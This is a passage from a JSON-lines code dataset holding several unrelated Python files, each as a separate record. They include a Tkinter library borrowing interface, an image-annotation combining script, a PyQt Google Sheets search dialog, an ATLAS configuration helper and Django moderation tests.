frm_bk_btns.pack(side=tk.LEFT,anchor=\"n\",pady=20,expand=False)\r\n \r\n frm_bk_btns.rowconfigure(0,weight=1)\r\n frm_bk_btns.rowconfigure(1,weight=1)\r\n frm_bk_btns.columnconfigure(0,weight=1)\r\n \r\n # Button Associated Message display #\r\n self.lbl_action_display = tk.Label(master=frm_bk_btns,text=\"\",\r\n width=12, \r\n font=('',10,'italic'),bg=\"white\")\r\n self.lbl_action_display.grid(row=0,column=0,pady=(0,5))\r\n \r\n # Borrow Button #\r\n self.btn_borrow = tk.Button(master=frm_bk_btns, text=\"Borrow\", \r\n height=2, padx=20, fg=\"White\", bg=\"DarkGreen\",\r\n state=tk.DISABLED, \r\n command=self.on_borrow_btn_press)\r\n self.btn_borrow.grid(row=1, column=0)\r\n \r\n # # Extend Button #\r\n # self.btn_extend = tk.Button(master=frm_bk_btns, text=\"Extend\", \r\n # height=2, padx=20, fg=\"White\", bg=\"LightBlue\",\r\n # state=tk.DISABLED, \r\n # command=self.on_extend_btn_press)\r\n # self.btn_extend.grid(row=1, column=0)\r\n # self.btn_extend.grid_remove()\r\n \r\n # Reserve Button #\r\n self.btn_reserve = tk.Button(master=frm_bk_btns, text=\"Reserve\", \r\n height=2, padx=20, fg=\"White\", bg=\"DarkGoldenRod\",\r\n state=tk.DISABLED,\r\n command=self.on_reserve_btn_press)\r\n self.btn_reserve.grid(row=1, column=0)\r\n self.btn_reserve.grid_remove()\r\n \r\n # Cancel Button #\r\n # self.btn_cancel = tk.Button(master=frm_bk_btns, text=\"Cancel\", \r\n # height=2, padx=20, fg=\"White\", bg=\"LightCoral\",\r\n # state=tk.DISABLED,\r\n # command=self.on_cancel_btn_press)\r\n # self.btn_cancel.grid(row=1, column=0)\r\n # self.btn_cancel.grid_remove()\r\n \r\n \r\n ### UI EVENT HANDLERS ###\r\n def getUpdateData(self, event):\r\n sub_vals = options[self.drop.get()]\r\n sub_disp = self.sub_drop.winfo_ismapped()\r\n \r\n if sub_vals == []: #no sub values \r\n if sub_disp:\r\n self.sub_drop.pack_forget()\r\n return \r\n if (not sub_disp):\r\n self.sub_drop.pack(side=tk.LEFT, fill=tk.Y,padx=(10,0))\r\n \r\n self.sub_drop['values'] = sub_vals\r\n\r\n def on_search_req_btn_press(self):\r\n if (not self.check_search_input()):\r\n return\r\n # Inputs valid:\r\n self.load_table1()\r\n\r\n def load_table1(self):\r\n search_df = self.search() #pandas df\r\n #Clear Treeview\r\n self.treeview1.delete(*self.treeview1.get_children())\r\n # Handle results\r\n if search_df.empty:\r\n self.lbl_msg_display.config(text=\"No results found\", fg=\"red\")\r\n if self.frm_bkdip.winfo_ismapped():\r\n self.frm_bkdip.grid_remove()\r\n else:\r\n self.search_results = search_df\r\n for index, row in search_df.iterrows():\r\n self.treeview1.insert('', 'end', values=(\r\n index, row[0], row[1], row[2]))\r\n\r\n def on_tree_select(self, event): \r\n item = self.treeview1.selection()[0]\r\n vals = self.treeview1.item(item, 'values')\r\n bk_id = int(vals[0])\r\n oVals = self.search_results.loc[bk_id,:]\r\n \r\n #Show book details frame (if hidden)\r\n if not self.frm_bkdip.winfo_ismapped():\r\n self.frm_bkdip.grid()\r\n #Update the book details frame\r\n self.load_book_thumb(bk_id,oVals[6])\r\n self.bk_title.set(vals[1])\r\n self.bk_author.set(oVals[4])\r\n self.bk_desc.set(oVals[5])\r\n #Update selection cursor\r\n self.bk_selected_id = bk_id\r\n self.bk_selected_title = vals[1]\r\n if not oVals[3] == \"NIL\":\r\n self.bk_selected_due = oVals[3].strftime(\"%d/%m/%Y\")\r\n print(self.bk_selected_due)\r\n #Update Buttons\r\n self.switch_button_states((vals[2],vals[3]))\r\n \r\n def load_book_thumb(self,book_id,url):\r\n self.cnv_picture.delete(\"all\")\r\n has_picture = False\r\n if url[:20] == 
\"https://s3.amazonaws\" :\r\n if book_id not in self.photos:\r\n print(\"Loading url...\")\r\n ## Load from URL\r\n # open the web page picture and read it into a memory stream\r\n # and convert to an image Tkinter can handle\r\n try: \r\n my_page = urlopen(url)\r\n # create an image file object\r\n my_picture = io.BytesIO(my_page.read())\r\n # use PIL to open image formats like .jpg .png .gif etc.\r\n pil_img = Image.open(my_picture)\r\n pil_img = pil_img.resize((125,125))\r\n # convert to an image Tkinter can use\r\n self.photos[book_id] = ImageTk.PhotoImage(pil_img)\r\n self.cnv_picture.create_image(60, 60, image=self.photos[book_id], anchor=tk.CENTER)\r\n has_picture = True\r\n except Exception as e: \r\n print(e)\r\n else: \r\n self.cnv_picture.create_image(60, 60, image=self.photos[book_id], anchor=tk.CENTER)\r\n\r\n if not has_picture:\r\n self.cnv_picture.create_text(60,60,font=\"Times 8 italic bold\",anchor=tk.CENTER,\r\n text=\"No Thumbnail available\")\r\n \r\n \r\n def switch_button_states(self,status):\r\n if self.user_unpaid_fines:\r\n return \r\n \r\n #By default, extend and cancel buttons are hidden\r\n if not self.btn_borrow.winfo_ismapped():\r\n self.btn_borrow.grid()\r\n if self.btn_reserve.winfo_ismapped():\r\n self.btn_reserve.grid_remove()\r\n self.lbl_action_display.grid_configure(pady=(0,5))\r\n \r\n #Status[0]: Available, On Loan \r\n #Status[1]: Reserved, Not Reserved \r\n if status[0] == \"Available\":\r\n #Can Borrow \r\n s = tk.NORMAL if len(self.user_borrowed) < 4 else tk.DISABLED\r\n self.btn_borrow.config(state=s)\r\n self.lbl_action_display.config(text=\"Available\\nfor borrowing\")\r\n else:\r\n #Cannot Borrow \r\n self.btn_borrow.config(state=tk.DISABLED)\r\n self.btn_borrow.grid_remove()\r\n #Check whether the book is borrowed by the current user\r\n print(self.bk_selected_id,\"|\",self.bk_selected_title)\r\n if self.bk_selected_id in self.user_borrowed:\r\n # #Borrowed by user -> can extend\r\n # self.btn_extend.config(state=tk.NORMAL)\r\n # self.btn_extend.grid()\r\n msg = \"You have\\nborrowed\\nthis item.\\nDue Date:\\n\" + self.bk_selected_due\r\n self.lbl_action_display.config(text= msg)\r\n else:\r\n #Not borrowed by user\r\n #Check whether it has been reserved\r\n if status[1] == \"Not Reserved\":\r\n #Can Reserve \r\n self.btn_reserve.config(state=tk.NORMAL)\r\n self.btn_reserve.grid()\r\n msg = \"Available after\\n\" + self.bk_selected_due\r\n self.lbl_action_display.config(text= msg)\r\n\r\n elif status[1] == \"Reserved\":\r\n #Cannot Reserve\r\n #Check whether the book is reserved by the current user\r\n if self.bk_selected_id in self.user_reserved:\r\n #Reserved by user -> can cancel;\r\n # self.btn_cancel.config(state=tk.NORMAL)\r\n # self.btn_cancel.grid()\r\n self.lbl_action_display.config(text=\"You have\\nreserved\\nthis item\")\r\n else:\r\n self.lbl_action_display.config(text=\"Item \\nhas been\\nreserved\\nby another\\nuser\") \r\n \r\n def on_borrow_btn_press(self):\r\n print(self.user_name,\" clicks borrow on \",self.bk_selected_id)\r\n borrow_status = bkborrow.borrow_book(self.bk_selected_id,self.user_name)\r\n if borrow_status == \"Borrowing succeeded\": #Everything Ok\r\n print(\"Borrow Ok\")\r\n self.user_borrowed.append(self.bk_selected_id)\r\n #Show borrow confirmation prompt\r\n msg = \"You have borrowed \" + self.bk_selected_title\r\n d1 = (datetime.today() + timedelta(days=28)).strftime(\"%d/%m/%Y\")\r\n msg += \"\\n Due date is \" + d1\r\n tk.messagebox.showinfo(\"Borrow Book\",msg)\r\n #Update selection date\r\n 
self.bk_selected_due = d1\r\n #Refresh the ui\r\n self.update_local_tree(\"borrow\")\r\n else:\r\n print(\"An error occured:\")\r\n print(borrow_status)\r\n #Update buttons states\r\n self.switch_button_states((\"On Loan\",\"Not Reserved\"))\r\n \r\n def on_reserve_btn_press(self):\r\n #print(self.user_name,\" clicks borrows \",self.bk_selected_id)\r\n reserve_status = bkborrow.reserve_book(self.bk_selected_id,self.user_name)\r\n if reserve_status == \"Book reserved\":\r\n print(\"Reserve Ok\")\r\n #Show reserve confirmation prompt\r\n self.user_reserved.append(self.bk_selected_id)\r\n msg = \"You have reserved \" + self.bk_selected_title\r\n tk.messagebox.showinfo(\"Borrow Book\",msg)\r\n #Refresh the ui\r\n self.update_local_tree(\"reserve\")\r\n else:\r\n print(\"An error occured:\")\r\n print(reserve_status)\r\n #Update buttons states\r\n self.switch_button_states((\"Not Available\",\"Reserved\"))\r\n \r\n \r\n def update_local_tree(self,action):\r\n selected = self.treeview1.focus()\r\n old_vals = self.treeview1.item(selected,\"values\")\r\n if action == \"borrow\":\r\n new_vals = (old_vals[0],old_vals[1],\"Not Available\",old_vals[3])\r\n elif action == \"reserve\":\r\n new_vals = (old_vals[0],old_vals[1],old_vals[2],\"Reserved\")\r\n else:\r\n new_vals = old_vals\r\n print(\"ERROR: invalid action\")\r\n \r\n self.treeview1.item(selected,text=\"\",values=new_vals)\r\n\r\n ### HELPER FUNCTIONS ###\r\n\r\n def check_search_input(self):\r\n valid_input = False\r\n # Check search field\r\n if self.search_text.get() == \"\" and self.drop.get() != \"Categories\":\r\n self.lbl_msg_display.config(text=\"Fill in Search Request\", fg=\"red\")\r\n else:\r\n self.lbl_msg_display.config(text=\"\", fg=\"green\")\r\n valid_input = True\r\n return valid_input\r\n\r\n def search(self):\r\n search_words = self.search_text.get()\r\n filt = self.drop.get()\r\n if search_words != \"\" or filt == \"Categories\":\r\n \r\n if filt == \"Title\":\r\n simple_search_dict = bksearch.simple_search(search_words)\r\n return bksearch.similarity_sort(simple_search_dict, search_words, \"title\")\r\n else:\r\n if filt == \"ISBN\" or filt == \"Categories\" or filt == \"Authors\":\r\n #print(self.drop.get())\r\n #print(self.sub_drop.get())\r\n advance_search_dict = bksearch.advance_search(search_words, filt.lower())\r\n return bksearch.similarity_sort(advance_search_dict, search_words, filt.lower())\r\n else:\r\n filt = filt.replace(\" \", \"\")\r\n secondary_filt = self.sub_drop.get()\r\n #print(self.drop.get())\r\n #print(self.sub_drop.get())\r\n #print(bksearch.advance_search(int(search_words),filt.lower(), secondary_filt.lower()))\r\n return bksearch.advance_search(int(search_words), filt.lower(), secondary_filt.lower())\r\n else:\r\n return pd.DataFrame()\r\n\r\n\r\n## DEBUG USE ONLY ###\r\nif __name__ == '__main__':\r\n root = tk.Tk()\r\n root.geometry('600x600')\r\n root.minsize(600, 600)\r\n container = tk.Frame(root)\r\n container.pack(side=\"top\", fill=\"both\", expand=True)\r\n container.grid_rowconfigure(0, weight=1)\r\n container.grid_columnconfigure(0, weight=1)\r\n \r\n test_user = {\"userId\": \"henrychia07\",\r\n \"unpaid_fines\": False,\r\n \"borrowed\": [79,308],\r\n \"reserved\": []\r\n }\r\n \r\n frame = SearchDisplay(container,root,test_user)\r\n frame.grid(row=0, column=0, sticky=\"nsew\")\r\n frame.tkraise()\r\n \r\n 
root.mainloop()","sub_path":"Frontend/page_searchdisplay.py","file_name":"page_searchdisplay.py","file_ext":"py","file_size_in_byte":21687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"44607366","text":"def compare(a, b):\r\n if a[1] > b[1]:\r\n return True\r\n elif a[1] == b[1]:\r\n return a[0] > b[0]\r\n else:\r\n return False\r\n\r\ndef sort(f):\r\n for i in range(1, len(f)):\r\n tmp = f[i]\r\n j = i - 1\r\n while j >= 0 and compare(tmp, f[j]):\r\n f[j + 1] = f[j]\r\n j -= 1\r\n f[j + 1] = tmp\r\n\r\nf = [[1,3], [2,7], [2,3], [4,4]]\r\nsort(f)\r\nprint(f)","sub_path":"модуль 2. задание 2.py","file_name":"модуль 2. задание 2.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"431472418","text":"import os\nfrom lxml import etree\nimport cv2\nimport numpy as np\nimport random\nimport glob\nimport argparse\nfrom utils import get_bboxes, draw_rect, remove_contents_in_dir\n\n\ndef get_sysargs():\n parser = argparse.ArgumentParser(description='Scrape Google images')\n parser.add_argument('-d1', '--dir1', type=str, help='dataset directory')\n parser.add_argument('-d2', '--dir2', type=str, help='dataset directory')\n return parser.parse_args()\n\n\ndef combine_xml(xml_path1, xml_path2, xml_combined_path, img_size, shift1, shift2):\n parser1 = etree.XMLParser(remove_blank_text=True)\n parser2 = etree.XMLParser(remove_blank_text=True)\n tree1 = etree.parse(xml_path1, parser1)\n root1 = tree1.getroot()\n tree2 = etree.parse(xml_path2, parser2)\n root2 = tree2.getroot()\n\n\n bbox_keys = ('xmin', 'ymin', 'xmax', 'ymax')\n bbox1 = tuple(map(lambda key: int(root1.find('object').find('bndbox').find(key).text), bbox_keys))\n bbox2 = tuple(map(lambda key: int(root2.find('object').find('bndbox').find(key).text), bbox_keys))\n bbox1 = shift_bbox(bbox1, shift1)\n bbox2 = shift_bbox(bbox2, shift2)\n\n size_keys = ('height', 'width')\n for key, val in zip(size_keys, img_size):\n root1.find('size').find(key).text = str(val)\n\n for key, val in zip(bbox_keys, bbox1):\n root1.find('object').find('bndbox').find(key).text = str(int(val))\n for key, val in zip(bbox_keys, bbox2):\n root2.find('object').find('bndbox').find(key).text = str(int(val))\n\n root1.find('src').text = '-'\n root1.find('object').addnext(root2.find('object'))\n xml_str = etree.tostring(root1, pretty_print=True)\n with open(xml_combined_path, 'wb') as f_xml:\n f_xml.write(xml_str)\n\n return (bbox1, bbox2)\n\n\ndef shift_bbox(bbox, shift):\n return bbox[0] + shift, bbox[1], bbox[2] + shift, bbox[3]\n\n\ndef combine_img(img_path1, img_path2, save_path):\n img1 = cv2.imread(img_path1)\n img2 = cv2.imread(img_path2)\n h1, w1 = img1.shape[:2]\n h2, w2 = img2.shape[:2]\n\n if random.uniform(0, 1) <= 0.5:\n img_combined = np.concatenate((img1, img2), axis=1)\n shift1 = 0\n shift2 = w1\n else:\n img_combined = np.concatenate((img2, img1), axis=1)\n shift1 = w2\n shift2 = 0\n\n cv2.imwrite(save_path, img_combined)\n return img_combined.shape[:2], shift1, shift2\n\n\ndef main():\n sysargs = get_sysargs()\n root_dir1 = sysargs.dir1\n root_dir2 = sysargs.dir2\n\n img_resized_dir1 = os.path.join(root_dir1, 'img_resized')\n xml_resized_dir1 = os.path.join(root_dir1, 'xml_resized')\n img_resized_dir2 = os.path.join(root_dir2, 'img_resized')\n xml_resized_dir2 = os.path.join(root_dir2, 'xml_resized')\n img_combined_dir = os.path.join(root_dir1, 'img_combined')\n xml_combined_dir = os.path.join(root_dir1, 
'xml_combined')\n ensure_dir = os.path.join(root_dir1, 'ensure_combine')\n\n for dir_path in [img_combined_dir, xml_combined_dir, ensure_dir]:\n if os.path.exists(dir_path):\n remove_contents_in_dir(dir_path)\n else:\n os.mkdir(dir_path)\n\n img_resized2 = [x for x in glob.glob(img_resized_dir2 + os.sep + '*')]\n random.shuffle(img_resized2)\n\n for img_name in os.listdir(img_resized_dir1):\n img_path1 = os.path.join(img_resized_dir1, img_name)\n img_root1, img_ext1 = os.path.splitext(img_name)\n xml_path1 = os.path.join(xml_resized_dir1, img_root1 + '.xml')\n img_path2 = img_resized2.pop()\n xml_path2 = os.path.join(\n xml_resized_dir2,\n os.path.splitext(os.path.basename(img_path2))[0] + '.xml'\n )\n\n img_combined_path = os.path.join(img_combined_dir, img_name)\n xml_combined_path = os.path.join(xml_combined_dir, img_root1 + '.xml')\n img_size, shift1, shift2 = combine_img(img_path1, img_path2, img_combined_path)\n bboxes = combine_xml(xml_path1, xml_path2, xml_combined_path, img_size, shift1, shift2)\n img_ensure_path = os.path.join(ensure_dir, img_name)\n bboxes, names = get_bboxes(xml_combined_path)\n draw_rect(img_combined_path, img_ensure_path, bboxes, names)\n print(img_combined_path)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"combine_img.py","file_name":"combine_img.py","file_ext":"py","file_size_in_byte":4199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"372039268","text":"from pyramid_template_matcher import PyramidTemplateMatcher\nfrom cv2img import CV2Img\n\ndef test_pyramid_template_matcher():\n source = CV2Img()\n source.load_file(\"./screen.png\")\n\n target = CV2Img()\n target.load_file(\"./gmail.png\")\n\n ratio = min(target.rows / 12, target.cols / 12)\n\n matcher = PyramidTemplateMatcher(source, target, 1, ratio)\n for i in range(0, 20):\n result = matcher.next()\n print(result)\n","sub_path":"test/test_pyramid_template_matcher.py","file_name":"test_pyramid_template_matcher.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"629958375","text":"from unittest.mock import Mock, patch\n\nfrom preference_data.query_generation.segment.segment_sampler import AbstractSegmentSampler\nfrom preference_data.query_generation.segment.segment_sampling_callback import SegmentSamplingCallback\n\n\n@patch.multiple(AbstractSegmentSampler, __abstractmethods__=set())\ndef test_samples_trajectory_segment_every_sampling_interval(policy_model):\n sample_mock = Mock()\n interval = 10\n\n segment_sampler = AbstractSegmentSampler(segment_samples=[],\n trajectory_buffer=policy_model.env.envs[0].trajectory_buffer)\n segment_sampler.try_to_sample = sample_mock\n\n callback = SegmentSamplingCallback(segment_sampler=segment_sampler, sampling_interval=interval,\n generation_volume=10)\n\n policy_model.learn(total_timesteps=interval, callback=callback)\n\n sample_mock.assert_called_once()\n","sub_path":"tests/preference_data/generation/test_segment_sampling_callback.py","file_name":"test_segment_sampling_callback.py","file_ext":"py","file_size_in_byte":911,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"114009756","text":"from os import system\nfrom colorama import init\nfrom termcolor import colored\nfrom models import contact\n\ninit()\n\ndef Print_Menu() :\n\tsystem(\"cls\")\n\tcontact.print_judul()\n\tprint(colored(\"Welcome\",\"white\"), 
colored('username','yellow'))\n\n\tMenu = \"\"\"\n[A]. Add New Item\n[B]. View All Items\n[C]. Search Item\n[D]. Delete Item\n[E]. Edit Item Information\n[F]. Add Item Stock\t\n[G]. Reduce Item Stock\n\n[U]. Add, Delete, and Edit\n     Username and Password\n\n[O]. About Application\n[Q]. Exit Application\n\"\"\"\n\tprint(Menu)\n\ndef Print_Menu_2() :\n\tsystem(\"cls\")\n\tcontact.print_judul()\n\tMenu = \"\"\"\n[A]. Add User\n[B]. View All Users\n[C]. Delete User\n\n[Q]. Back to MENU\n\t\"\"\"\n\tprint(Menu)\n\ndef tentang_aplikasi() :\n\tsystem(\"cls\")\n\tcontact.print_judul()\n\tprint(colored(\">> \",\"green\"),colored(\"Version : 2.0\",\"yellow\"))\n\tprint(colored(\">> \",\"green\"),colored(\"Creator : Vergeo Valentino Gunawan (9.A)\",\"yellow\"))\n\tcontact.print_continue()","sub_path":"views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"557648108","text":"# dlg_find.py\n\nfrom credentials import google_sheet, main_sheet_first_row\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtGui import *\nimport PyQt5.QtWidgets as QtWidgets\nimport sys\nfrom PyQt5 import uic\nimport numpy as np\nimport time, datetime\n\n\nclass find_dlg(QDialog):\n\n    def __init__(self):\n        QDialog.__init__(self)\n        self.ui = uic.loadUi(\"setting/dialog_find.ui\", self)\n        self.ui.show()\n        self.find_order_state.clicked.connect(self.order_state_append_btn_click)\n        self.find_one_hundred.clicked.connect(self.find_one_hundred_btn_click)\n        self.all_find_btn.clicked.connect(self.all_find_btn_click)\n        self.treeWidget.setColumnWidth(0, 110)\n\n        self.treeWidget.itemDoubleClicked.connect(self.win_append)\n        self.normal_shutdown_token = False\n        self.editor = \"\"\n\n    def find_header(self):\n        headerItem = self.treeWidget.headerItem()\n        num_of_column = headerItem.columnCount()\n\n        header = []\n        for i in range(num_of_column):\n            x = headerItem.text(i)\n            header.append(x)\n\n        return header\n\n    def make_index_list(self):\n        header_list = self.find_header()\n\n        index_list = [main_sheet_first_row.index(x) for x in header_list \\\n                      if x in main_sheet_first_row]  # must not fail on header errors.\n        return index_list\n\n    def make_wanted_range_cells(self, num_of_find = 10000):\n\n        try: last_index = len(google_sheet.ms.col_values(1))\n        except Exception as ex:\n            google_sheet.refresh_data();\n            last_index = len(google_sheet.ms.col_values(1))\n        first_index = last_index - num_of_find\n        if first_index < 2: first_index = 2\n        col_index = len(main_sheet_first_row)\n\n        try:\n            wanted_range_cells = google_sheet.ms.range(first_index, 1, \\\n                                                       last_index, col_index)\n        except Exception as ex:\n            google_sheet.refresh_data()\n            wanted_range_cells = google_sheet.ms.range(first_index, 1, \\\n                                                       last_index, col_index)\n\n        num_of_model = int(len(wanted_range_cells) / col_index)\n        wanted_range_cells = [wanted_range_cells[i * col_index: (i + 1) * col_index] for i in\n                              range(num_of_model)]\n\n        return np.array(wanted_range_cells)\n\n    def set_none(self):\n        headerItem = self.treeWidget.headerItem()\n        num_of_column = headerItem.columnCount()\n        self.treeWidget.addTopLevelItem(QTreeWidgetItem(['None'] + [\"\"] * (num_of_column - 1)))\n\n    def order_state_append_btn_click(self):\n        try:\n\n            self.treeWidget.clear()\n\n            index_list = self.make_index_list()\n            wanted_value = self.order_state.currentText()\n            order_state_index = main_sheet_first_row.index(\"주문 상태\")\n            wanted_range_cells = self.make_wanted_range_cells()\n\n            for cells in wanted_range_cells:\n                if 
wanted_value == cells[order_state_index].value:\n                    wanted_cells = cells[index_list]\n                    list_for_treewidget = [x.value for x in wanted_cells]\n                    self.treeWidget.addTopLevelItem(QTreeWidgetItem(list_for_treewidget))\n                    continue\n\n            if self.treeWidget.topLevelItemCount() == 0 :\n                self.set_none()\n\n        except Exception as ex:\n            text = \"Error raised: \\n\" + str(ex)\n            self.textEdit.setText(text)\n\n    def all_find_btn_click(self):\n        try:\n            self.treeWidget.clear()\n            index_list = self.make_index_list()\n            wanted_value = self.all_text.text()\n\n            if not wanted_value.replace(\" \", \"\") : return 0\n            wanted_range_cells = self.make_wanted_range_cells()\n\n            for cells in wanted_range_cells:\n                for cell in cells:\n                    if wanted_value.replace(\"-\", \"\").replace(\" \", \"\") \\\n                            in cell.value.replace(\"-\", \"\").replace(\" \", \"\") :\n                        wanted_cells = cells[index_list]\n                        list_for_treewidget = [x.value for x in wanted_cells]\n                        self.treeWidget.addTopLevelItem(QTreeWidgetItem(list_for_treewidget))\n                        break\n\n            if self.treeWidget.topLevelItemCount() == 0 :\n                self.set_none()\n\n        except Exception as ex:\n            text = \"Error raised \\n\" + str(ex)\n            self.textEdit.setText(text)\n\n    def find_one_hundred_btn_click(self):\n        try:\n            self.treeWidget.clear()\n\n            index_list = self.make_index_list()\n            wanted_range_cells = self.make_wanted_range_cells(num_of_find=100)\n\n            for cells in wanted_range_cells:\n                wanted_cells = cells[index_list]\n                list_for_treewidget = [x.value for x in wanted_cells]\n                self.treeWidget.addTopLevelItem(QTreeWidgetItem(list_for_treewidget))\n\n            if self.treeWidget.topLevelItemCount() == 0 :\n                self.set_none()\n\n        except Exception as ex:\n            text = \"Error raised: \\n\" + str(ex)\n            self.textEdit.setText(text)\n\n\n    def win_append(self):\n        try:\n            time_stamp = self.treeWidget.currentItem().text(0)\n            time_stamp_index = main_sheet_first_row.index(\"타임스탬프\")\n\n            try:\n                time_stamp_list = google_sheet.ms.col_values(col=time_stamp_index + 1, \\\n                                                             value_render_option='FORMATTED_VALUE')\n            except:\n                google_sheet.refresh_data()\n                time_stamp_list = google_sheet.ms.col_values(col=time_stamp_index + 1, \\\n                                                             value_render_option='FORMATTED_VALUE')\n\n            if not time_stamp in time_stamp_list:\n                raise Exception(\"No matching information\")\n\n            index = time_stamp_list.index(time_stamp)\n            g_range = google_sheet.ms.range(index + 1, 1, index + 1, len(main_sheet_first_row))\n\n            self.customer_info = {}\n            for cell, name in zip(g_range, main_sheet_first_row):\n                self.customer_info[name] = cell.value\n\n\n            # last access\n            time_stamp = datetime.datetime.now().strftime('%m. 
%d %p %I:%M:%S')\n            time_stamp = time_stamp.replace(\"PM\", \"오후\").replace(\"AM\", \"오전\")\n            text = self.editor + \"__({})\".format(time_stamp)\n            google_sheet.ms.update_cell(index + 1, main_sheet_first_row.index(\"last_access\") + 1, text )\n\n            print(\"main sheet load complete\")\n            self.normal_shutdown_token = True\n            self.close()\n\n        except Exception as ex:\n            text = \"Error raised \\n\" + str(ex)\n            self.textEdit.setText(text)\n\n\nif __name__ == \"__main__\":\n    app = QApplication(sys.argv)\n    myWindow = find_dlg()\n    myWindow.show()\n    app.exec_()","sub_path":"dlg_find.py","file_name":"dlg_find.py","file_ext":"py","file_size_in_byte":6999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"411236349","text":"# Copyright (C) 2002-2019 CERN for the benefit of the ATLAS collaboration\nfrom __future__ import print_function\nfrom AthenaCommon.Logging import logging\nfrom AthenaCommon.CFElements import isSequence\nfrom AthenaCommon.Configurable import ConfigurableAlgTool\nfrom GaudiKernel.GaudiHandles import PrivateToolHandle, PrivateToolHandleArray\nimport six\n\nmsg = logging.getLogger('PropSetterProxy')\n\nclass PropSetterProxy(object):\n    __compPaths = {}\n    __scannedCA = None\n\n    def __init__(self, ca, path):    \n        self.__path = path    \n        self.__findComponents( ca )\n        \n    def __setattr__(self, name, value):\n        if name.startswith(\"_PropSetterProxy\"):\n            return super(PropSetterProxy, self).__setattr__(name, value)\n\n        if name != \"OutputLevel\":\n            msg.warning( \"Only OutputLevel is allowed to be changed with the foreach_component at the moment\" )\n            return\n\n        \n        import fnmatch\n        for component_path, component in six.iteritems(PropSetterProxy.__compPaths):\n            if fnmatch.fnmatch( component_path, self.__path ):\n                if name in component._descriptors:\n                    try:\n                        setattr( component, name, value )\n                        msg.info( \"Set property: %s to value %s of component %s because it matched %s \",\n                                  name, str(value), component_path, self.__path )\n                    except Exception as ex:\n                        msg.warning( \"Failed to set property: %s to value %s of component %s because it matched %s, reason: %s\",\n                                     name, str(value), component_path, self.__path, str(ex) )\n                        pass\n                else:\n                    msg.warning( \"No such property: %s in component %s, tried to set it because it matched %s\",\n                                 name, component_path, self.__path )\n\n\n    def __findComponents(self, ca):\n        if ca is not PropSetterProxy.__scannedCA:\n            PropSetterProxy.__scannedCA = ca\n            PropSetterProxy.__compPaths = {}\n            def __add(path, comp):\n                if comp.getName() == \"\":\n                    return\n                PropSetterProxy.__compPaths[ path ] = comp\n\n\n            for svc in ca._services:\n                PropSetterProxy.__compPaths['SvcMgr/'+svc.getFullJobOptName()] = svc\n            for t in ca._publicTools:\n                PropSetterProxy.__compPaths['ToolSvc/'+t.getFullJobOptName()] = t\n                \n            def __nestAlg(startpath, comp): # it actually dives inside the algorithms and (sub) tools    \n                if comp.getName() == \"\":\n                    return\n                for name, value in six.iteritems(comp._descriptors):\n                    if isinstance( value.cpp_type, ConfigurableAlgTool ) or isinstance( value.cpp_type, PrivateToolHandle ):\n                        __add( startpath+\"/\"+name+\"/\"+value.getFullJobOptName(), value )\n                        __nestAlg( startpath+\"/\"+name+\"/\"+value.getName(), value )\n                    if isinstance( value.cpp_type, PrivateToolHandleArray):\n                        for toolIndex,t in enumerate(value):\n                            __add( startpath+\"/\"+name+\"/\"+t.getFullJobOptName(), t )\n                            __nestAlg( startpath+\"/\"+name+\"/\"+t.getName(), value[toolIndex] )\n                    \n                    \n            def __nestSeq( startpath, seq ):\n                for c in seq.Members:\n                    if isSequence(c):\n                        __nestSeq( 
startpath+\"/\"+c.getName(), c ) \n else: # the algorithm or tool\n __add( startpath+\"/\"+c.getFullJobOptName(), c )\n __nestAlg( startpath+\"/\"+c.getFullJobOptName(), c )\n\n __nestSeq(\"\", ca._sequence)\n \n \n\n\n\n","sub_path":"Control/AthenaConfiguration/python/PropSetterProxy.py","file_name":"PropSetterProxy.py","file_ext":"py","file_size_in_byte":3776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"128328770","text":"# coding=utf-8\nfrom global_test_case import GlobalTestCase as TestCase\nfrom subdomains.tests import SubdomainTestMixin\nfrom ..models import Message, WriteItInstance, \\\n Moderation, Confirmation, \\\n OutboundMessage\nfrom popit.models import Person\nfrom django.core import mail\nfrom django.contrib.sites.models import Site\nfrom subdomains.utils import reverse\nimport datetime\nfrom mock import patch\nfrom django.core.exceptions import ValidationError\nfrom django.utils.translation import ugettext as _\n\nclass ModerationMessagesTestCase(TestCase, SubdomainTestMixin):\n def setUp(self):\n super(ModerationMessagesTestCase,self).setUp()\n self.writeitinstance1 = WriteItInstance.objects.all()[0]\n self.person1 = Person.objects.all()[0]\n self.private_message = Message.objects.create(content = 'Content 1', \n author_name='Felipe', \n author_email=\"falvarez@votainteligente.cl\", \n subject='Subject 1', \n public=False,\n writeitinstance= self.writeitinstance1, \n persons = [self.person1])\n self.confirmation = Confirmation.objects.create(message=self.private_message)\n self.host = self.get_host_for_subdomain(self.writeitinstance1.slug)\n\n def test_private_messages_confirmation_created_move_from_new_to_needs_moderation(self):\n moderation, created = Moderation.objects.get_or_create(message=self.private_message)\n self.private_message.recently_confirmated()\n \n outbound_message_to_pedro = OutboundMessage.objects.get(message=self.private_message)\n self.assertEquals(outbound_message_to_pedro.status, 'needmodera')\n\n\n def test_private_message_is_not_accesible(self):\n self.confirmation.confirmated_at = datetime.datetime.now()\n self.confirmation.save()\n self.private_message.confirmated = True\n self.private_message.save()\n host = self.get_host_for_subdomain(self.private_message.writeitinstance.slug)\n url = self.private_message.get_absolute_url()\n response = self.client.get(url,HTTP_HOST=host)\n\n self.assertEquals(response.status_code, 404)\n\n\n def test_outbound_messages_of_a_confirmed_message_are_waiting_for_moderation(self):\n #I need to do a get to the confirmation url\n moderation, created = Moderation.objects.get_or_create(message=self.private_message)\n url = reverse('confirm', kwargs={\n 'slug':self.confirmation.key\n })\n response = 